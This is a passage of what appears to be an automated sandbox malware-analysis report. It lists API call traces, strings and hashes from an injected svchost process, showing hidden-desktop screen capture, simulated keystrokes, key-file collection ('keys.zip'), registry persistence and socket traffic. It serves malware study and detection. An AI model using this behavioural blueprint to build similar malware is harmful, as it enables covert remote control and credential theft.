                                                                                                                                                                                                              • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                              • String ID: A23C4505$Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}$RFK
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}), ref: 02CAB91C
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02CAB925
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CAB939
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CAB94B
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(a23c41af), ref: 02CAB956
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,a23c41af,ALPHA), ref: 02CAB970
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 02CAB976
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                              • String ID: ALPHA$Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}$a23c41af
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}), ref: 02CAFEAC
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02CAFEB5
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CAFEC9
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CAFEDB
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(a23c4015), ref: 02CAFEE6
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,a23c4015,HANDY), ref: 02CAFF00
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 02CAFF06
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                              • String ID: HANDY$Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}$a23c4015
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: /$UT
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memcpy$_snprintf
                                                                                                                                                                                                              • String ID: 0$%x$Content-Length
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C9B843
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02C9B870
                                                                                                                                                                                                              • IsWindow.USER32(?), ref: 02C9B877
                                                                                                                                                                                                              • SendMessageA.USER32(?,00000215,00000000,00000000), ref: 02C9B889
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 02C9B898
                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 02C9B8A2
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C9B8B4
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02C9B8E1
                                                                                                                                                                                                              • IsWindow.USER32(?), ref: 02C9B8E8
                                                                                                                                                                                                              • SendMessageA.USER32(?,00000215,00000000,?), ref: 02C9B8FB
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$MessageMutexObjectReleaseSendSingleThreadWait$CurrentProcess
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(02CED19C), ref: 02CB4297
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(02CED19C,?,?), ref: 02CB4329
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF7722F-8989-4fe1-977D-95CD777C0214},?,?), ref: 02CB43B5
                                                                                                                                                                                                                • Part of subcall function 02CB59D0: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02CB59EE
                                                                                                                                                                                                                • Part of subcall function 02CB59D0: GetSecurityDescriptorSacl.ADVAPI32(?,?,00000001,02C95DE8,?,?,02C95DE8,?,00000001), ref: 02CB5A0B
                                                                                                                                                                                                                • Part of subcall function 02CB59D0: SetNamedSecurityInfoA.ADVAPI32(?,02C95DE8,00000010,00000000,00000000,00000000,00000001), ref: 02CB5A26
                                                                                                                                                                                                                • Part of subcall function 02CB59D0: LocalFree.KERNEL32(?,?,?,02C95DE8,?,00000001), ref: 02CB5A37
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,Local\{EAF7722F-8989-4fe1-977D-95CD777C0214},00000006), ref: 02CB43D2
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02CB43D9
                                                                                                                                                                                                                • Part of subcall function 02C97310: GetHandleInformation.KERNEL32(?,00000000), ref: 02C97324
                                                                                                                                                                                                                • Part of subcall function 02C97310: CloseHandle.KERNEL32(?), ref: 02C97335
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Security$Descriptor$BackslashHandleMutexPath$CloseConvertCreateFreeInfoInformationLocalNamedReleaseSaclSleepString
                                                                                                                                                                                                              • String ID: Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}$keys.zip$path.txt
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\private\), ref: 02CAC139
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CAC0E0,00000000,00000000,00000000), ref: 02CAC186
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\public\), ref: 02CAC19E
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CAC0C0,00000000,00000000,00000000), ref: 02CAC1E2
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CAC1FA
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CAC20B
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateHandleThread$CloseInformation
                                                                                                                                                                                                              • String ID: \private\$\public\
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02C969A2
                                                                                                                                                                                                              • memset.MSVCRT ref: 02C969C0
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(?,?,00000104), ref: 02C969DD
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000102,?,?,?), ref: 02C96A4D
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,5DD2BAAFa,00000000,00000001,?,00000104), ref: 02C96A6F
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 02C96A7D
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memset$CloseOpenValuelstrcpyn
                                                                                                                                                                                                              • String ID: 5DD2BAAFa$software\microsoft
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetWindowLongA.USER32(02C9CE3A,000000F0), ref: 02C9E26B
                                                                                                                                                                                                              • GetLastActivePopup.USER32(02C9CE3A), ref: 02C9E279
                                                                                                                                                                                                              • GetWindow.USER32(00000000,00000005), ref: 02C9E293
                                                                                                                                                                                                              • GetWindow.USER32(00000000), ref: 02C9E296
                                                                                                                                                                                                              • GetWindowInfo.USER32(00000000,?), ref: 02C9E2AC
                                                                                                                                                                                                              • GetWindow.USER32(00000000,00000004), ref: 02C9E2B5
                                                                                                                                                                                                              • GetWindow.USER32(00000000,00000003), ref: 02C9E2EE
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$ActiveInfoLastLongPopup
                                                                                                                                                                                                              • String ID: <
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heapmemcpy$AllocProcessmemset
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • StrCmpNIA.SHLWAPI(00000001,?,00000000,HTTP/1.,00000007,?,02C9FCE7,00000000,?,02C9FCE7,,-059BF5C8,00000000,00000000,02C9FCE7,?), ref: 02C9F0CD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: $Connection$Content-Length$HTTP/1.$Proxy-Connection$Transfer-Encoding$chunked$close
                                                                                                                                                                                                              • API String ID: 0-1412996494
                                                                                                                                                                                                              • Opcode ID: 24ac6dc93036a74f08cb666f5652c1efb8c1cfbc9e6f24008b1f33c6bf3555f2
                                                                                                                                                                                                              • Instruction ID: cea17d452b7bc535c89f3ef317404b71ba1c6fe03164c84bc2e69f700ac6d82a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 24ac6dc93036a74f08cb666f5652c1efb8c1cfbc9e6f24008b1f33c6bf3555f2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 45712935A00205ABEF24CE68CC49BAE7FADDF95318F24946EE845D7A40E771DA41CBD0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: callocexitfree
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3367576030-0
                                                                                                                                                                                                              • Opcode ID: 142a8971e488061fa5ae4325c91eb7dd66a740e6ed9b296e12cde4b56b51c37b
                                                                                                                                                                                                              • Instruction ID: b5b1a8aeaa8f76fa2d0b65f66f0178c7f4e18ebbe1492840ee24bf31c07478ab
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 142a8971e488061fa5ae4325c91eb7dd66a740e6ed9b296e12cde4b56b51c37b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 37618EB1A01609BFDF20CF68C884BAE77A8FF88754F104459ED8697340D770EA51CBA2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WindowFromDC.USER32(?), ref: 02C9C31C
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C9C354
                                                                                                                                                                                                              • CreateRectRgn.GDI32(00000001,00000001,00000001,00000001), ref: 02C9C362
                                                                                                                                                                                                              • GetClipRgn.GDI32(?,00000000), ref: 02C9C36C
                                                                                                                                                                                                              • SelectClipRgn.GDI32(00000000,00000000), ref: 02C9C37C
                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 02C9C383
                                                                                                                                                                                                              • GetViewportOrgEx.GDI32(?,?), ref: 02C9C38E
                                                                                                                                                                                                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 02C9C3A2
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02C9C3E3
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ClipObjectViewport$CreateDeleteFromMutexRectReleaseSelectSingleWaitWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3315380975-0
                                                                                                                                                                                                              • Opcode ID: 523c09f202c5f0abc56152b11e9d6730d986f80c92533c568925c9122a719702
                                                                                                                                                                                                              • Instruction ID: cd5a0abcdfd65260c0ca16c2e6ac79e36a5588b73ba1374fe2e78460c8ae49cb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 523c09f202c5f0abc56152b11e9d6730d986f80c92533c568925c9122a719702
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5841FAB6641205AFCB14CF99DC88EAB77BDFB8C751B408A09FA19D7240D734E950CBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(00401CB0,?,0000001C), ref: 004012DF
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 004012F5
                                                                                                                                                                                                              • PathFileExistsA.SHLWAPI(?), ref: 00401302
                                                                                                                                                                                                              • GetTempPathA.KERNEL32(00000104,?,00000000), ref: 00401319
                                                                                                                                                                                                              • GetTempFileNameA.KERNEL32(?,00000000,00000000,?), ref: 00401331
                                                                                                                                                                                                              • MoveFileExA.KERNEL32(?,?,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0040134D
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 0040135C
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 00401369
                                                                                                                                                                                                              • MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 0040137D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2972647321.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$MoveNamePathTemp$AttributesDeleteExistsModuleQueryVirtual
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2787354276-0
                                                                                                                                                                                                              • Opcode ID: 9164c7000edcc80bd832700f9075c338832eee041a947671531ff51fe6c52d9d
                                                                                                                                                                                                              • Instruction ID: 42c1c782f055159cc2832ed009bcca8814697c7b1d580040d5fe2fedb3335bbb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9164c7000edcc80bd832700f9075c338832eee041a947671531ff51fe6c52d9d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D921CFB1950219AFEB10DBA0DD49FEA77BCFB48700F0046A9A709F6190E6749A44CFA4
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetThreadDesktop.USER32(?), ref: 02C99350
                                                                                                                                                                                                                • Part of subcall function 02C98F20: SelectObject.GDI32(00000000,00000000), ref: 02C98F3A
                                                                                                                                                                                                                • Part of subcall function 02C98F20: DeleteObject.GDI32(00000000), ref: 02C98F49
                                                                                                                                                                                                                • Part of subcall function 02C98F20: DeleteDC.GDI32(00000000), ref: 02C98F57
                                                                                                                                                                                                                • Part of subcall function 02C98F20: SelectObject.GDI32(?,00000000), ref: 02C98F67
                                                                                                                                                                                                                • Part of subcall function 02C98F20: DeleteObject.GDI32(00000000), ref: 02C98F6F
                                                                                                                                                                                                                • Part of subcall function 02C98F20: DeleteDC.GDI32(?), ref: 02C98F78
                                                                                                                                                                                                                • Part of subcall function 02C98F20: GetDC.USER32(00000000), ref: 02C98F7C
                                                                                                                                                                                                                • Part of subcall function 02C98F20: CreateCompatibleDC.GDI32(00000000), ref: 02C98F8B
                                                                                                                                                                                                                • Part of subcall function 02C98F20: CreateCompatibleDC.GDI32(00000000), ref: 02C98F93
                                                                                                                                                                                                                • Part of subcall function 02C98F20: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02C98FB4
                                                                                                                                                                                                                • Part of subcall function 02C98F20: SelectObject.GDI32(?,00000000), ref: 02C98FC3
                                                                                                                                                                                                                • Part of subcall function 02C98F20: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02C98FDE
                                                                                                                                                                                                                • Part of subcall function 02C98F20: SelectObject.GDI32(00000000,00000000), ref: 02C98FFD
                                                                                                                                                                                                                • Part of subcall function 02C98F20: ReleaseDC.USER32(00000000,00000000), ref: 02C9900C
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000001F4), ref: 02C9937C
                                                                                                                                                                                                              • GetTopWindow.USER32(00000000), ref: 02C9938B
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C9939E
                                                                                                                                                                                                              • GetWindow.USER32(00000000,00000005), ref: 02C993B4
                                                                                                                                                                                                              • GetWindow.USER32(00000000), ref: 02C993B7
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000,00000000), ref: 02C993C6
                                                                                                                                                                                                              • SetEvent.KERNEL32(00000000), ref: 02C993CF
                                                                                                                                                                                                              • Sleep.KERNEL32(00000032), ref: 02C993DB
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Object$CompatibleCreateDeleteSelect$Window$BitmapReleaseSingleWait$DesktopEventMutexSleepThread
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4064958368-0
                                                                                                                                                                                                              • Opcode ID: 8d23d554f9257485382384f8ebbc0afcde0b724762cbee5b0cbd48e02c0982bf
                                                                                                                                                                                                              • Instruction ID: 193d02fdb77f73fb2590138a39eb4fabd73c26feb5347350e45c55191c6a352f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8d23d554f9257485382384f8ebbc0afcde0b724762cbee5b0cbd48e02c0982bf
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BD115BB5D82205ABCF10AB79EC8CF1B37ACAB497507404F08B515CB2C0DA70E920CFA4
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00402FF7
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000300,004036DE,753CE610,00402FDE), ref: 0040300F
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00403012
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000300), ref: 0040301F
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00403022
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,004036DE,004036DE,753CE610,00402FDE), ref: 0040302B
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 0040302E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,004036DE), ref: 0040303B
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0040303E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2972647321.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$Free$Validate$String
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2629017576-0
                                                                                                                                                                                                              • Opcode ID: edeb09d6da527b41af017446eb360d9cd81bb1d2aa2956dafed66ea6837698d8
                                                                                                                                                                                                              • Instruction ID: 103af2a08650daedf0ea572f36775c75d91e7ca6a6ced768a9e875140008d5cd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: edeb09d6da527b41af017446eb360d9cd81bb1d2aa2956dafed66ea6837698d8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E5F05EB56012117BEA206BB66D8CF572A6CEF88B82F084025B709F2180CA74CE109678
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • send.WS2_32(?,02CD9E44,00000002,00000000), ref: 02CA9A2A
                                                                                                                                                                                                              • recv.WS2_32(?,?,00000002,00000000), ref: 02CA9A4E
                                                                                                                                                                                                              • recv.WS2_32(?,00000001,?,00000000), ref: 02CA9A7C
                                                                                                                                                                                                              • recv.WS2_32(?,?,00000001,00000000), ref: 02CA9AA0
                                                                                                                                                                                                              • recv.WS2_32(?,?,?,00000000), ref: 02CA9AC5
                                                                                                                                                                                                              • lstrcmpA.KERNEL32(02CDFCA8,00000001,?,00000000), ref: 02CA9AED
                                                                                                                                                                                                              • lstrcmpA.KERNEL32(02CDFBA0,?,?,00000000), ref: 02CA9AFF
                                                                                                                                                                                                              • send.WS2_32(?,02CD9E48,00000002,00000000), ref: 02CA9B0E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: recv$lstrcmpsend
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1090895577-0
                                                                                                                                                                                                              • Opcode ID: d9c4c928ed15965bef91b3bcfcc7144a93a954beb8acd5c704252e815d0f0e56
                                                                                                                                                                                                              • Instruction ID: b6e31b6f60ad993afc7fed899245009d5e9a8b4e50f3610d8dc03a418964e075
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d9c4c928ed15965bef91b3bcfcc7144a93a954beb8acd5c704252e815d0f0e56
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9231AF71A4525A39EB3196645C52FFEB77C9FC5704F1042C5E6449A141D3B09B478BA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,?,?,?,?,02C99F49,00000000,?,?,?,?,02C99400,?,?), ref: 02C99C41
                                                                                                                                                                                                              • MapVirtualKeyW.USER32(00000000,00000000), ref: 02C99C5F
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000,?,?,?,?,02C99F49,00000000,?,?,?,?,02C99400,?,?), ref: 02C99D2F
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000,?,?,?,?,02C99F49,00000000,?,?,?,?,02C99400,?,?), ref: 02C99D51
                                                                                                                                                                                                              • SendMessageA.USER32(?,0000E2AD,00000000,00000000), ref: 02C99D98
                                                                                                                                                                                                              • SendMessageW.USER32(?,?,00000003,00000000), ref: 02C99DBE
                                                                                                                                                                                                              • PostMessageW.USER32(?,00000101,?,?), ref: 02C99DCB
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Message$MutexReleaseSend$ObjectPostSingleVirtualWait
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3783495248-0
                                                                                                                                                                                                              • Opcode ID: e8a1fca5e21c69c459a310fe7ebf9e1317214f079c7aff008e09d72061867bbd
                                                                                                                                                                                                              • Instruction ID: fb874e09bc3eed5408295957545ed8cdd128c048eda58bdf2fdbcafa50bc8fcd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e8a1fca5e21c69c459a310fe7ebf9e1317214f079c7aff008e09d72061867bbd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0B518C32A45280EAEF21CB2DE84CBA57FD49B86328F08468ED8C1CF2D2C3756655D790
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsWindowVisible.USER32(02C9D21D), ref: 02C9CAAF
                                                                                                                                                                                                              • GetWindowInfo.USER32(02C9D21D,?), ref: 02C9CAC9
                                                                                                                                                                                                              • GetClassLongA.USER32(02C9D21D,000000E6), ref: 02C9CB1E
                                                                                                                                                                                                              • PrintWindow.USER32(02C9D21D,?,00000000), ref: 02C9CB37
                                                                                                                                                                                                              • BitBlt.GDI32(02C9CD02,?,?,?,?,75C0BCB0,00000000,00000000,00CC0020), ref: 02C9CBDE
                                                                                                                                                                                                                • Part of subcall function 02C9DCE0: GetClassNameA.USER32(?,?,00000101), ref: 02C9DCF6
                                                                                                                                                                                                                • Part of subcall function 02C9C8D0: SendMessageA.USER32(00000000,?,00000004,00000000), ref: 02C9C8F8
                                                                                                                                                                                                                • Part of subcall function 02C9C8D0: GdiFlush.GDI32(00000000,?,02C9C9F1,00000000,?), ref: 02C9C90E
                                                                                                                                                                                                                • Part of subcall function 02C9C8D0: BitBlt.GDI32(02C9C9F1,00000000,00000000,?,02C9C9F1,?,00000000,00000000,00CC0020), ref: 02C9C934
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$Class$FlushInfoLongMessageNamePrintSendVisible
                                                                                                                                                                                                              • String ID: <
                                                                                                                                                                                                              • API String ID: 2334662925-4251816714
                                                                                                                                                                                                              • Opcode ID: e11ebe062a91a4ebc7f99dfa621c88f009f49ee1ff64aa893799b69ca797b583
                                                                                                                                                                                                              • Instruction ID: 90eb79c1752f06f1c71ca9a62c59d820f1a098f82cd68b86f93655d9fdcf69bb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e11ebe062a91a4ebc7f99dfa621c88f009f49ee1ff64aa893799b69ca797b583
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A8414B71E01519AFCF14CF98C988AADFBBABF88354B55425AE409E3640D730BA51CBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02C95A60
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02C95A8C
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02C95AB3
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02C95AD4
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(000003DC,000003E8), ref: 02C95B04
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(000003DC), ref: 02C95B25
                                                                                                                                                                                                              • SetLastError.KERNEL32(?), ref: 02C95B3E
                                                                                                                                                                                                              Memory Dump Source
